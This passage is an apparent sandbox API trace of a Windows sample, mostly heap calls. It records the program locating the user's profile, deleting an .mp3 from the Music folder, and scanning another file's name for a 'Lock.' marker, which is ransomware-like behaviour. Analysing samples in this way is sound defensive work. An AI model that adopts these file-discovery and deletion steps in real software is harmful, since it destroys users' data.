[0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0253.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0253.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.062] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0253.062] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.063] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0253.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0253.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0253.065] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3", lpFilePart=0x8bedfc*="SI3T x_6.mp3") returned 0x30 [0253.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0253.065] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\si3t x_6.mp3")) returned 0x20 [0253.065] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bd51140, ftCreationTime.dwHighDateTime=0x1d4cd15, ftLastAccessTime.dwLowDateTime=0x473185e0, ftLastAccessTime.dwHighDateTime=0x1d4d061, ftLastWriteTime.dwLowDateTime=0x473185e0, ftLastWriteTime.dwHighDateTime=0x1d4d061, nFileSizeHigh=0x0, nFileSizeLow=0xc6c8, dwReserved0=0x13aa, dwReserved1=0x4, cFileName="SI3T x_6.mp3", cAlternateFileName="SI3TX_~1.MP3")) returned 0xaa5920 [0253.065] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\si3t x_6.mp3")) returned 1 [0253.066] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bd51140, ftCreationTime.dwHighDateTime=0x1d4cd15, ftLastAccessTime.dwLowDateTime=0x473185e0, ftLastAccessTime.dwHighDateTime=0x1d4d061, ftLastWriteTime.dwLowDateTime=0x473185e0, ftLastWriteTime.dwHighDateTime=0x1d4d061, nFileSizeHigh=0x0, nFileSizeLow=0xc6c8, dwReserved0=0x13aa, dwReserved1=0x4, cFileName="SI3T x_6.mp3", cAlternateFileName="SI3TX_~1.MP3")) returned 0 [0253.066] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0253.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.066] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0253.067] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0253.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.067] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0253.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0253.069] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3", lpFilePart=0x8bf658*="SI3T x_6.mp3") returned 0x30 [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0253.070] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\si3t x_6.mp3")) returned 0xffffffff [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.070] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0253.070] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.070] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0253.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0253.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T3QpSK22qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3QpSK22qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QpSK22qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pSK22qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SK22qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K22qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="22qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qbSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bSdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SdU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dU8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YAX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AX.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 